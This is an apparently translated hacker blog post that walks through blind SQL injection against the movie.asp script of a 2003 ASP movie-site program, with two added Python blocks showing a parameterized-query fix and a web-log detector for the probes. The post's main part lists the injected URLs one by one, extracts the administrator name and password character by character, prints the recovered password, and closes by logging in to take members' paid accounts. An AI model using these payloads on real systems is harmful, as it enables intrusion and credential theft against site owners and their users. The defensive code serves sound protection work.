Today I was browsing the internet and found a good post about how to break into a free movie website. The program is simple and written in ASP, so I believe anyone who has learned ASP can understand it. The specific content is as follows:
Recently I learned SQL injection and downloaded the jinmei movie program 2003 member edition. I found a problem in the file movie.asp:
Dim SQL
Dim rs
ArticleID = Request("ID")   ' taken straight from the query string, never validated
Set rs = Server.CreateObject("ADODB.Recordset")
SQL = "update learning set hits = hits + 1 where ArticleID = " & ArticleID   ' raw value concatenated into the SQL text
rs.Open SQL, Conn, 1, 3
SQL = "select * from learning where ArticleID = " & ArticleID   ' same again for the read
rs.Open SQL, Conn, 1, 1
Title = rs("title")
Ittype = rs("typeid")
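The fault in the snippet above is the concatenation of an unchecked request value into the SQL text. The following Python, added here as an illustration and not part of the original post or the jinmei program, reproduces that pattern against an in-memory SQLite table (a constructed stand-in for the site's Access database; the table, columns and sample row are assumed) and sets it beside the hardened form: an integer check on the id plus a bound parameter, so a boolean suffix of the kind shown later in the post is refused instead of being executed.

```python
import re
import sqlite3


def make_db():
    """Constructed stand-in for the site's 'learning' table (SQLite, not Access)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "create table learning (ArticleID integer primary key, title text, "
        "typeid integer, hits integer)"
    )
    conn.execute("insert into learning values (330, 'Some film', 2, 0)")
    conn.commit()
    return conn


def lookup_concatenated(conn, article_id):
    """Mirrors movie.asp: the raw request value is pasted into the SQL text,
    so anything after the number becomes part of the WHERE clause and the
    page's content turns into a yes/no oracle for the attacker."""
    sql = "select title from learning where ArticleID = " + article_id
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def lookup_parameterized(conn, article_id):
    """Hardened form: the value must be a short run of digits, and it is bound
    as a parameter so the database never interprets it as SQL."""
    if not re.fullmatch(r"\d{1,9}", article_id):
        raise ValueError("ArticleID must be a positive integer")
    key = int(article_id)
    conn.execute("update learning set hits = hits + 1 where ArticleID = ?", (key,))
    row = conn.execute("select title from learning where ArticleID = ?", (key,)).fetchone()
    return row[0] if row else None


def rejects(conn, value):
    """True when the hardened lookup refuses the value outright."""
    try:
        lookup_parameterized(conn, value)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    db = make_db()
    # With concatenation, a trailing condition decides whether the row comes back.
    print(lookup_concatenated(db, "330"))           # Some film
    print(lookup_concatenated(db, "330 and 1=0"))   # None: the suffix was executed
    # With validation plus a bound parameter, the same input is refused.
    print(rejects(db, "330 and 1=0"))               # True
    print(lookup_parameterized(db, "330"))          # Some film
```

The integer check is what turns the injection point into a dead end: the bound parameter alone would already stop the value from being parsed as SQL, but rejecting non-numeric ids early also keeps the probing requests out of the database tier and makes them easy to log.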
The variables are not checked at all. Haha, I found a target website,
and we started testing the length of the administrator account. Because the field that stores the administrator account is called name, the statement is:
http://www.target.com/movie.asp?id=330 and 1=(select id from password where Len(name)>4)
The page returns normally, so we know the administrator account is longer than 4 characters!
We continue,
http://www.target.com/movie.asp?id=330 and 1=(select id from password where Len(name)>
"The webpage cannot be displayed". An error occurred, so we know the administrator account is greater than or equal to 8 characters.
Let's go back,
http://www.target.com/movie.asp?id=330 and 1=(select id from password where Len(name)=8)
The page returns normally.
name is 8 characters.
Similarly,
http://www.target.com/movie.asp?id=330 and 1=(select id from password where Len(PWD)=21)
The page returns normally.
PWD is 21 characters, damn, that's long!
Now let's test the administrator's username.
http://www.target.com/movie.asp?id=320 and 1=(select id from password where Asc(Mid(name,1,1))>50)
The page returns normally, so 50 is not big enough.
Note: the Mid function can split the password into pieces; its form is Mid(string, start position, length of the piece to retrieve).
http://www.target.com/movie.asp?id=320 and 1=(select id from password where Asc(Mid(name,1,1))>100)
"The webpage cannot be displayed", so it seems to be smaller than 100.
http://www.target.com/movie.asp?id=320 and 1=(select id from password where Asc(Mid(name,1,1))=100)
The page returns normally, so we get the ASCII code of the first character of the administrator's username: 100
Looking up the ASCII table,
the first character of name: d
Continuing this way, we get name = darkeyes
Then we started testing PWD; with 21 characters to go, what a long journey! :)
http://www.target.com/movie.asp?id=320 and 1=(select id from password where Asc(Mid(PWD,1,1))>100)
The page is displayed normally.
http://www.target.com/movie.asp?id=320 and 1=(select id from password where Asc(Mid(PWD,1,1))>110)
"The webpage cannot be displayed", so smaller than 110, heh heh
http://www.target.com/movie.asp?id=320 and 1=(select id from password where Asc(Mid(PWD,1,1))=102)
The page is displayed normally.
The first character of PWD is: F
Finally, we got it all:
PWD = xyfsdb7ew8y654233663d
Find the management page, log in, grab the accounts of several gold members, and enjoy the movies.
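From the defender's side, the probing sequence above leaves a distinctive trace: the id parameter of movie.asp, which should only ever be a number, arrives carrying SQL syntax, many times in a row from one client, with the occasional server error where a guess was wrong. The following Python, added here as an example that is not part of the original post, parses constructed IIS W3C-style log lines (the fields, addresses and timestamps are made up, shaped after the requests in the write-up) and flags those requests, then names any client that sent enough probes to look like blind enumeration.

```python
import re
from collections import Counter
from urllib.parse import parse_qs

# Constructed W3C-style log lines: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status.
# Not real traffic and not the site's own logs; the probe shapes follow the write-up.
SAMPLE_LOG = """\
2003-11-02 10:00:01 10.0.0.5 GET /movie.asp id=330 200
2003-11-02 10:00:02 10.0.0.5 GET /movie.asp id=331 200
2003-11-02 10:01:10 10.0.0.9 GET /movie.asp id=330+and+1%3D(select+id+from+password+where+len(name)%3E4) 200
2003-11-02 10:01:11 10.0.0.9 GET /movie.asp id=330+and+1%3D(select+id+from+password+where+len(name)%3D8) 200
2003-11-02 10:01:12 10.0.0.9 GET /movie.asp id=320+and+1%3D(select+id+from+password+where+asc(mid(name,1,1))%3E100) 500
2003-11-02 10:01:13 10.0.0.9 GET /movie.asp id=320+and+1%3D(select+id+from+password+where+asc(mid(pwd,1,1))%3D102) 200
2003-11-02 10:02:00 10.0.0.7 GET /movie.asp id=abc 200
"""

# SQL keywords and the VBA/Access string functions used for character-by-character guessing,
# plus the punctuation that only appears when the value is being parsed as SQL.
SQL_TOKENS = re.compile(
    r"\b(select|union|insert|update|delete|len|asc|mid|chr|and|or)\b|[()';]", re.I
)


def parse_line(line):
    """Split one W3C log line into its seven fields; None for blank or comment lines."""
    if not line.strip() or line.startswith("#"):
        return None
    date, time, ip, method, stem, query, status = line.split()
    return {"when": f"{date} {time}", "ip": ip, "method": method, "stem": stem,
            "query": "" if query == "-" else query, "status": int(status)}


def classify_id(value):
    """movie.asp only ever needs a numeric id, so anything else is noteworthy:
    'probe' when it carries SQL syntax, 'malformed' otherwise."""
    if re.fullmatch(r"\d+", value):
        return "ok"
    return "probe" if SQL_TOKENS.search(value) else "malformed"


def scan(log_text, threshold=3):
    """Return (alerts, enumerating_ips): one alert per suspicious id value, plus the
    clients that sent at least `threshold` probes, the signature of blind enumeration."""
    alerts, probes_by_ip = [], Counter()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["stem"].lower() != "/movie.asp":
            continue
        # parse_qs undoes the '+' and %XX encoding, so the SQL text is visible again.
        for value in parse_qs(rec["query"], keep_blank_values=True).get("id", []):
            verdict = classify_id(value)
            if verdict == "ok":
                continue
            alerts.append({"when": rec["when"], "ip": rec["ip"], "kind": verdict,
                           "status": rec["status"], "id": value})
            if verdict == "probe":
                probes_by_ip[rec["ip"]] += 1
    enumerating = sorted(ip for ip, n in probes_by_ip.items() if n >= threshold)
    return alerts, enumerating


if __name__ == "__main__":
    found, noisy = scan(SAMPLE_LOG)
    for a in found:
        print(f'{a["when"]} {a["ip"]} {a["kind"]:9} HTTP {a["status"]} id={a["id"]!r}')
    print("clients enumerating via blind probes:", noisy)
```

The HTTP 500 on one of the probe lines is the server-side face of the "webpage cannot be displayed" answers in the write-up; a burst of non-numeric ids from one address that alternates between 200 and 500 is about as clear a blind-injection signature as a web log can give, and is worth an alert on its own even before any keyword matching.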